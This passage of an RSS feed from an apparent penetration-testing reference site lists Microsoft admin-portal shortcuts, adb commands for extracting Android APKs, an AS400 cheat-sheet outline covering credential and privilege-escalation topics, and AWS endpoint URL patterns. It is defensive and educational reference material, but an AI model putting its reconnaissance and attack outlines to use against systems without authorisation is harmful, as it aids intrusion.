 &lt;td&gt;&lt;a href="https://aka.ms/ad/pim"&gt;aka.ms/ad/pim&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;pim&lt;/td&gt;
 &lt;td&gt;Privileged Identity Management&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/users"&gt;aka.ms/ad/users&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;users&lt;/td&gt;
 &lt;td&gt;Users&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/groups"&gt;aka.ms/ad/groups&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;groups&lt;/td&gt;
 &lt;td&gt;Groups&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/devices"&gt;aka.ms/ad/devices&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;devices&lt;/td&gt;
 &lt;td&gt;Devices&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/apps"&gt;aka.ms/ad/apps&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;apps&lt;/td&gt;
 &lt;td&gt;Enterprise Applications&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/appreg"&gt;aka.ms/ad/appreg&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;appreg&lt;/td&gt;
 &lt;td&gt;Application Registrations&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/auth"&gt;aka.ms/ad/auth&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;auth&lt;/td&gt;
 &lt;td&gt;Authentication Methods Policies&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/legacymfa"&gt;aka.ms/ad/legacymfa&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;legacymfa&lt;/td&gt;
 &lt;td&gt;Legacy MFA&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/guests"&gt;aka.ms/ad/guests&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;guests&lt;/td&gt;
 &lt;td&gt;Guest Access Settings&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/logs"&gt;aka.ms/ad/logs&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;logs&lt;/td&gt;
 &lt;td&gt;Sign in Logs&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/xtap"&gt;aka.ms/ad/xtap&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;xtap&lt;/td&gt;
 &lt;td&gt;Cross Tenant Access Settings&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/roles"&gt;aka.ms/ad/roles&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;roles&lt;/td&gt;
 &lt;td&gt;Azure AD Roles&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/sspr"&gt;aka.ms/ad/sspr&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;sspr&lt;/td&gt;
 &lt;td&gt;Password Reset&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/security"&gt;aka.ms/ad/security&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;security&lt;/td&gt;
 &lt;td&gt;Security&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/mfaunblock"&gt;aka.ms/ad/mfaunblock&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;mfaunblock&lt;/td&gt;
 &lt;td&gt;MFA Unblock&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/reviews"&gt;aka.ms/ad/reviews&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;reviews&lt;/td&gt;
 &lt;td&gt;Access Reviews&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/score"&gt;aka.ms/ad/score&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;score&lt;/td&gt;
 &lt;td&gt;Secure Score&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/license"&gt;aka.ms/ad/license&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;license&lt;/td&gt;
 &lt;td&gt;Licenses&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/synclog"&gt;aka.ms/ad/synclog&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;synclog&lt;/td&gt;
 &lt;td&gt;AAD Connect Sync Errors&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/adfslog"&gt;aka.ms/ad/adfslog&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;adfslog&lt;/td&gt;
 &lt;td&gt;ADFS Log&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/consent"&gt;aka.ms/ad/consent&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;consent&lt;/td&gt;
 &lt;td&gt;Consents and Permissions&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/support"&gt;aka.ms/ad/support&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;support&lt;/td&gt;
 &lt;td&gt;Support&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ad/list"&gt;aka.ms/ad/list&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;list&lt;/td&gt;
 &lt;td&gt;List all these shortcuts&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="microsoft-admin-portals" class="anchored-heading"&gt;Microsoft Admin Portals&lt;a class="heading-anchor" href="#microsoft-admin-portals" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;aka.ms&lt;/th&gt;
 &lt;th&gt;Command&lt;/th&gt;
 &lt;th&gt;Page&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/admin"&gt;aka.ms/admin&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;admin&lt;/td&gt;
 &lt;td&gt;&lt;a href="https://admin.microsoft.com"&gt;M365 Admin Portal&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/azad"&gt;aka.ms/azad&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;azad&lt;/td&gt;
 &lt;td&gt;&lt;a href="https://portal.azure.com"&gt;Azure AD Portal&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ge"&gt;aka.ms/ge&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;ge&lt;/td&gt;
 &lt;td&gt;&lt;a href="https://developer.microsoft.com/graph/graph-explorer"&gt;Graph Explorer&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/intune"&gt;aka.ms/intune&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;intune&lt;/td&gt;
 &lt;td&gt;&lt;a href="https://endpoint.microsoft.com"&gt;Intune&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/ppac"&gt;aka.ms/ppac&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;ppac&lt;/td&gt;
 &lt;td&gt;&lt;a href="https://admin.powerplatform.microsoft.com/"&gt;Power Platform&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="microsoft-intune-portals" class="anchored-heading"&gt;Microsoft Intune Portals&lt;a class="heading-anchor" href="#microsoft-intune-portals" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;aka.ms&lt;/th&gt;
 &lt;th&gt;Command&lt;/th&gt;
 &lt;th&gt;Page&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/in"&gt;aka.ms/in&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;in&lt;/td&gt;
 &lt;td&gt;Intune admin center&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/intuneshd"&gt;aka.ms/intuneshd&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;intuneshd&lt;/td&gt;
 &lt;td&gt;Intune service health&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/intunesupport"&gt;aka.ms/intunesupport&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;support&lt;/td&gt;
 &lt;td&gt;Get Intune Support&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/enrollmymac"&gt;aka.ms/enrollmymac&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;enrollmymac&lt;/td&gt;
 &lt;td&gt;Download the Intune Company Portal for Macs&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="microsoft-365-defender" class="anchored-heading"&gt;Microsoft 365 Defender&lt;a class="heading-anchor" href="#microsoft-365-defender" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;aka.ms&lt;/th&gt;
 &lt;th&gt;Command&lt;/th&gt;
 &lt;th&gt;Portal Blade&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/de"&gt;aka.ms/de&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;de&lt;/td&gt;
 &lt;td&gt;Microsoft 365 Defender&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/de/incidents"&gt;aka.ms/de/incidents&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;incidents&lt;/td&gt;
 &lt;td&gt;Incidents&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/de/hunting"&gt;aka.ms/de/hunting&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;hunting&lt;/td&gt;
 &lt;td&gt;Hunting&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/de/actions"&gt;aka.ms/de/actions&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;actions&lt;/td&gt;
 &lt;td&gt;Action Center&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/de/explorer"&gt;aka.ms/de/explorer&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;explorer&lt;/td&gt;
 &lt;td&gt;Explorer&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="microsoft-user-portals" class="anchored-heading"&gt;Microsoft User Portals&lt;a class="heading-anchor" href="#microsoft-user-portals" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;aka.ms&lt;/th&gt;
 &lt;th&gt;Page&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/sspr"&gt;aka.ms/sspr&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;Self Service Password Reset&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/mysecurity"&gt;aka.ms/mysecurity&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;My Security&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/myapps"&gt;aka.ms/myapps&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;My Apps&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/my-account"&gt;aka.ms/my-account&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;My Account&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/my-groups"&gt;aka.ms/my-groups&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;My Groups&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/my-access"&gt;aka.ms/my-access&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;My Access Packages&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/mystaff"&gt;aka.ms/mystaff&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;My Access Packages&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/mfasetup"&gt;aka.ms/mfasetup&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;Alternative for My Security&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="identity-protection" class="anchored-heading"&gt;Identity Protection&lt;a class="heading-anchor" href="#identity-protection" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;aka.ms&lt;/th&gt;
 &lt;th&gt;Page&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/identityprotection"&gt;aka.ms/identityprotection&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;Identity Protection&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="winget-windows-package-manager" class="anchored-heading"&gt;Winget (Windows Package Manager)&lt;a class="heading-anchor" href="#winget-windows-package-manager" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;aka.ms&lt;/th&gt;
 &lt;th&gt;Page&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/getwinget"&gt;aka.ms/getwinget&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;Get Winget Installer&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/winget-docs"&gt;aka.ms/winget-docs&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;Winget Documentation&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/winget"&gt;aka.ms/winget&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;Winget Packages (Github Repo)&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="miscellaneous" class="anchored-heading"&gt;Miscellaneous&lt;a class="heading-anchor" href="#miscellaneous" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;aka.ms&lt;/th&gt;
 &lt;th&gt;Page&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/entradeprecations"&gt;aka.ms/entradeprecations&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;Entra/Azure AD related retirements/deprecations&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/entratemplates"&gt;aka.ms/entratemplates&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;Email templates &amp;amp; posters to roll out Azure Active Directory features&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;a href="https://aka.ms/odsp-mm-fs"&gt;aka.ms/Fileshare Migration&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;Fileshare Migration Portal&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/microsoft/aka"&gt;microsoft/aka - GitHub - microsoftopensource&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/levid0s/AzurePortals"&gt;levid0s/AzurePortals - levid0s - 2019&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Android Application</title><link>https://bokkapig.pages.dev/refs/internal/methodology/android-applications/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/methodology/android-applications/</guid><description>&lt;h2 id="lab" class="anchored-heading"&gt;Lab&lt;a class="heading-anchor" href="#lab" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/payatu/diva-android"&gt;payatu/diva-android&lt;/a&gt; - Damn Insecure and vulnerable App for Android&lt;/li&gt;
&lt;li&gt;&lt;a href="https://app.hackthebox.com/challenges/282"&gt;HTB VIP - Pinned&lt;/a&gt; - Hack The Box challenge&lt;/li&gt;
&lt;li&gt;&lt;a href="https://app.hackthebox.com/challenges/283"&gt;HTB VIP - Manager&lt;/a&gt; - Hack The Box challenge&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="extract-apk" class="anchored-heading"&gt;Extract APK&lt;a class="heading-anchor" href="#extract-apk" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="adb-method" class="anchored-heading"&gt;ADB Method&lt;a class="heading-anchor" href="#adb-method" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;Connect to ADB shell and list/download packages.
You might need to enable &lt;code&gt;Developer mode&lt;/code&gt; and &lt;code&gt;Debugging&lt;/code&gt; in order to connect with &lt;code&gt;adb&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;adb&lt;/span&gt; &lt;span class="n"&gt;shell&lt;/span&gt; &lt;span class="n"&gt;pm&lt;/span&gt; &lt;span class="n"&gt;list&lt;/span&gt; &lt;span class="n"&gt;packages&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;adb&lt;/span&gt; &lt;span class="n"&gt;shell&lt;/span&gt; &lt;span class="n"&gt;pm&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt; &lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;example&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;someapp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;adb&lt;/span&gt; &lt;span class="n"&gt;pull&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;app&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;example&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;someapp&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;apk&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="stores" class="anchored-heading"&gt;Stores&lt;a class="heading-anchor" href="#stores" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;Warning: Downloading APK files from unofficial stores can compromise your device&amp;rsquo;s security. These sources often host malware and malicious software. Always use trusted and official app stores for downloads.&lt;/p&gt;</description></item><item><title>AS400</title><link>https://bokkapig.pages.dev/refs/internal/cheatsheets/as-400/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cheatsheets/as-400/</guid><description>&lt;p&gt;AS400 (IBM i) is a midrange computer system developed by IBM, originally released in 1988. Now known as IBM i running on Power Systems, it is widely used for business applications due to its stability, security, and integrated database (DB2 for i)&lt;/p&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#lab"&gt;Lab&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#enumeration"&gt;Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#access-and-audit"&gt;Access and Audit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#default-credentials"&gt;Default Credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#user-enumeration"&gt;User Enumeration&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#telnet"&gt;Telnet&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#pop3"&gt;POP3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#ftp"&gt;FTP&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#useful-commands"&gt;Useful Commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#nmap-scripts"&gt;NMAP Scripts&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#user-class"&gt;User Class&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#authority"&gt;Authority&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#special-authority"&gt;Special Authority&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#adopted-authority"&gt;Adopted Authority&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#password-cracking"&gt;Password Cracking&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#privilege-escalation"&gt;Privilege Escalation&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#initial-program-breakout"&gt;Initial Program Breakout&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#hijack-profile---secofr-security-class"&gt;Hijack Profile - SECOFR Security Class&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#hijack-profile---authorities"&gt;Hijack Profile - Authorities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#hijack-profile---profile-swapping"&gt;Hijack Profile - Profile Swapping&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#unqualified-library-calls"&gt;Unqualified Library Calls&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#from-allobj-to-secadm"&gt;From ALLOBJ to SECADM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#arbitrary-command-execution"&gt;Arbitrary Command Execution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="lab" class="anchored-heading"&gt;Lab&lt;a class="heading-anchor" href="#lab" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/mainframed/DC30_Workshop"&gt;mainframed/DC30_Workshop&lt;/a&gt; - DEFCON 30 Mainframe buffer overlow workshop container&lt;/p&gt;</description></item><item><title>AWS - Access Token &amp; Secrets</title><link>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-access-token/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/aws/aws-access-token/</guid><description>&lt;h2 id="url-services" class="anchored-heading"&gt;URL Services&lt;a class="heading-anchor" href="#url-services" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Service&lt;/th&gt;
 &lt;th&gt;URL&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;s3&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://{user_provided}.s3.amazonaws.com&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;cloudfront&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://{random_id}.cloudfront.net&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;ec2&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://ec2-{ip-seperated}.compute-1.amazonaws.com&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;es&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://{user_provided}-{random_id}.{region}.es.amazonaws.com&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;elb&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;elbv2&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://{user_provided}-{random_id}.{region}.elb.amazonaws.com&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;rds&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;rds&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;route 53&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;{user_provided}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;execute-api&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;cloudsearch&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;transfer&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;sftp://s-{random_id}.server.transfer.{region}.amazonaws.com&lt;/code&gt;&lt;/td&gt;
